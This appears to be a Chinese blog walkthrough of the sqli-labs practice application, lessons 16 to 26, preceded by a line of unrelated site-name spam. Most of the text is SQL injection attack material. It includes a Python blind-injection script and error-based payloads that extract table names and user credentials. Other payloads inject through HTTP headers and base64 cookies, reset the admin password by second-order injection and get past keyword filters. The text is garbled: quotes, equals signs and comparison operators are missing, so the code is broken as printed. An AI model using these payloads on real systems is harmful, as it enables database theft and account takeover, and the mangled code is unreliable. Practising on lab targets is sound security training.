天津网站建设有哪些,三门峡集团网站建设,阿坝县建设局网站,邹城房产信息网文章目录 less-163.注入 less-172.数据库名2.1 floor报错注入数据库名 3.查到数据表3.1floor 报错注入数据表 4.查取列名4.1 floor报错注入 列名 5.查取内容 less-181.添加X-Forwarded-For测试2修改User-Agent测试3.查数据表名4.查数据列5.查取数据 less-192.查数据库3.查数据表… 文章目录 less-163.注入 less-172.数据库名2.1 floor报错注入数据库名 3.查到数据表3.1floor 报错注入数据表 4.查取列名4.1 floor报错注入 列名 5.查取内容 less-181.添加X-Forwarded-For测试2修改User-Agent测试3.查数据表名4.查数据列5.查取数据 less-192.查数据库3.查数据表4.查数据列5.查取数据 less-202.查数据库3.查数据表4.查数据列5.查取数据 less-212.查数据库3.查数据表4.查数据列5.查取数据 less-222.查数据库3.查数据表4.查数据列5.查取数据 less-232.查数据库3.查数据表4.查数据列5.查取数据 less-24创建用户admin#修改admin#的密码我们admin的密码是admin这里我们用登录admin用户密码用1登陆试试登陆成功 less-252.查数据库3.查看数据表4.查看数据列常见and or 绕过大小写混杂绕过anDOr等复写绕过anandd oorr等运算符绕过|| (在url中会省略后面的参数)url编码绕过 |%7c %26 5.查数据 less-262.查询数据库3.数据表4.数据列5.数据内容 less-16 发现和less15差不多就闭合变为了”
3.注入
import requestsurl http://localhost/sqlilabs/Less-16/
def get_database(url, yuju, chishu):name for i in range(1, chishu):minr 32maxr 129middle (minr maxr) // 2while minr maxr :data {uname: admin) and ascii(substr((%s), %d, 1)) %d -- % (yuju, i, middle), passwd: asdfadff}request requests.post(url, datadata)if flag.jpg in request.text:minr middle 1# print(True)else:# print(False)maxr middlemiddle (minr maxr) // 2if maxr 32:break# print(middle)name name chr(middle)print(name)yuju input(输入查询语句:)
chishu int(input(大概查询次数:))
get_database(url, yuju, chishu)less-17 这里呢我们发现uname用了过滤passwd就没有从执行顺序上看发现想进入到注入语句$row就得有数据所以用户得存在然后再passwd处下功夫用报错注入试试
2.数据库名
1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--
1 and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入2.1 floor报错注入数据库名
1 and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入 3.查到数据表
1and updatexml(1, concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema security),0x7e),1)-- 3.1floor 报错注入数据表
1 and (select 1 from (select count(*), concat((select group_concat(distinct table_name) from information_schema.columns where table_schema security), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- 4.查取列名
1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema security and table_name users),0x7e),1)-- 4.1 floor报错注入 列名
1 and (select 1 from (select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入 5.查取内容
1 and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)-- 很明显这里并没有注入出来 这里报错的意思你不能在查询user表时更改表中的数据在同一语句中 因为这里的注入点时update语句 我们这里语句拼接好 update users set password 1 and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) //这里明显有一个查user表的语句1 and updatexml(1,substr(concat(0x7e,(select t.name from (select group_concat(username, 0x3a, password) as name from users ) as t),0x7e),1,32),1)-- //这里修改为创建一个新表新表的内容为users表的内容在查询新表less-18 这里我们看到unamepasswd都有被过滤但是他对响应信息有一个入库的操作这里我们可以试试 HTPP_USER_AGENT:user_agent REMOTE_ADDR:X-Forwarded-For 用burp suite进行抓包然后发送到重发部模块
1.添加X-Forwarded-For测试
这里呢我们不用逃逸单引号因为insert语句这后面需要构造为了不必要的构造我们
X-Forwarded-For:1 and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and 11没有什么用
2修改User-Agent测试
1 and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and 113.查数据表名
1 and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema security), 0x7e), 1) and 111 and (select 1 from (select count(*), concat((select group_concat(table_name) from information_schema.columns where table_schema security), floor(rand(0) * 2)) as x from information_schema.columns group by x) as z )and 11 4.查数据列
1 and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), 0x7e), 1) and 111 and (select 1 from (select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) and 115.查取数据
1 and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) and 11less-19 这里和less-18差不多就是注入点为referer 2.查数据库
1 and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and 113.查数据表
1 and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema security), 0x7e), 1) and 114.查数据列
1 and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), 0x7e), 1) and 115.查取数据
1 and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) and 11less-20 这里呢只展示了二次提交时候的代码在二次提交时才会有注入点 完整流程大概就是先判断你有没有cookie没有就登录登录通过后设置cookie的uname字段值为用户明然后二次提交后再回到这个页面这次有cookie就直接到了上面这段代码发现二次提交时cookie可以改没有过滤然后有一个查表的动作后面有报错语句利用报错注入 第一次提交 第二次提交 2.查数据库
1 and updatexml(1, concat(0x7e, (database()), 0x7e), 1) --3.查数据表
1 and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema security), 0x7e), 1)--4.查数据列
1 and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), 0x7e), 1) --5.查取数据
1 and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) --less-21 其实和less-20差不多就多了个base64的编码解码闭合改为了 )
2.查数据库
1) and updatexml(1, concat(0x7e, (database()), 0x7e), 1) -- //末尾空格
编码后MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChkYXRhYmFzZSgpKSwgMHg3ZSksIDEpLS0g3.查数据表
1) and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema security), 0x7e), 1)--
MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgZ3JvdXBfY29uY2F0KGRpc3RpbmN0IHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyksIDB4N2UpLCAxKS0tIA4.查数据列
1) and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), 0x7e), 1) -- MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnKSwgMHg3ZSksIDEpIC0tIA5.查取数据
1) and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) -- MScpIGFuZCB1cGRhdGV4bWwoMSxzdWJzdHIoY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSwzMiksMSkgLS0gless-22 其实和less-22差不多就逃逸符号为双引号
2.查数据库
1 and updatexml(1, concat(0x7e, (database()), 0x7e), 1) -- //末尾空格
编码后MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKGRhdGFiYXNlKCkpLCAweDdlKSwgMSkgLS0g3.查数据表
1 and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema security), 0x7e), 1)-- MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKHNlbGVjdCAgZ3JvdXBfY29uY2F0KGRpc3RpbmN0IHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyksIDB4N2UpLCAxKS0tICA4.查数据列
1 and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), 0x7e), 1) -- MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZSA9ICd1c2VycycpLCAweDdlKSwgMSkgLS0g5.查取数据
1 and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) -- MSIgYW5kIHVwZGF0ZXhtbCgxLHN1YnN0cihjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwweDdlKSwxLDMyKSwxKSAtLSAless-23 这里它把注释(–, #)符号过滤了。将它替换成了所以我们不选择注释改为闭合 -1’ union select 1,database(),3拼接为select * from users where id’ -1’ union select 1, database(), 3’ limit 0,1;
2.查数据库
?id-1 union select 1,database(),33.查数据表
?id-1 union select 1, 2, group_concat(distinct table_name) from information_schema.columns where table_schema security4.查数据列
?id-1 union select 1, 2, group_concat(column_name) from information_schema.columns where table_schema security and table_name users5.查取数据
?id-1 union select 1, (select group_concat(username,0x3a,password) from users), 3less-24 这个呢注入点就是再创建用户的时候可以用单引号和注释符虽然单引号会被转意但是写入库是会吧转义符去掉例如admin’# 接收后admin\‘#写入数据库时(admin’#) 取出时也是(admin’#)这时候我们改密码时候我们用户虽然时admin’#但是#在数据库时注释符再上面截屏中的更新语句中实际上更新的是admin的用户所以我们可以通过admin用户登录
创建用户admin’# 修改admin’#的密码 我们admin的密码是admin这里我们用登录admin用户密码用1登陆试试 登陆成功 less-25 2.查数据库
?id-1 union select 1, database(),1 --3.查看数据表
id-1 union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema security--4.查看数据列
常见and or 绕过
大小写混杂绕过anDOr等
这里失败了因为它忽略大小写无论带小写都会匹配上
?id1 AnD 11复写绕过anandd oorr等 运算符绕过|| (在url中会省略后面的参数)
?id-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema security anandd table_name users-- ?id-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema security table_name users-- ?id1 || 12url编码绕过 |%7c %26
?id-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema security %26%26 table_name users-- 5.查数据
id-1 union select 1,group_concat(username), group_concat(password) from users -- less-26 这里呢过滤了and or 忽略大小写这点倒是可以过滤比如 编码 复写还有注释符-- #通过闭合来绕过至于空格可以用多行注释/**/用(),来界定或者其他字符代替
2.查询数据库
?id-1 || updataxml(1,concat(0x7e,database(),0x7e),1)oorr113.数据表
?id-1 || updatexml(1,concat(0x7e,(select(group_concat(distinct table_name))from(infoorrmation_schema.columns)where table_schemasecurity),0x7e),1)oorr114.数据列
id1 || updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where table_schemasecurityananddtable_nameusers),0x7e),1)anandd115.数据内容
?id-1||updatexml(1,substr(concat(0x7e,(select(group_concat(username,0x3a,passwoorrd))from(users)),0x7e),1,32),1)aandnd11
